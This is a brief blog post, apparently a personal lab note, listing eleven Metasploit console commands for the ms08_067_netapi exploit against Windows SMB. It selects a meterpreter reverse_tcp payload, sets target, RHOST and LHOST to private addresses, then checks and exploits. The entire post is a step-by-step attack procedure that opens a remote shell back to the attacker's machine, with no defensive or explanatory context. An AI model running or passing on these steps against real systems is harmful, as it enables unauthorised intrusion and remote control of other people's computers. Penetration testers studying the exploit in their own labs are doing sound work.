Sunday, April 14, 2013

ms08_067_netapi metasploit module - quick note

1. use windows/smb/ms08_067_netapi

2. set payload windows/meterpreter/reverse_tcp

3. show options

4. show target

5. set target 4

6. show target

7. set RHOST 192.168.169.145

8. set LHOST 192.168.169.132

9. show options

10. check

11. exploit

No comments:

Post a Comment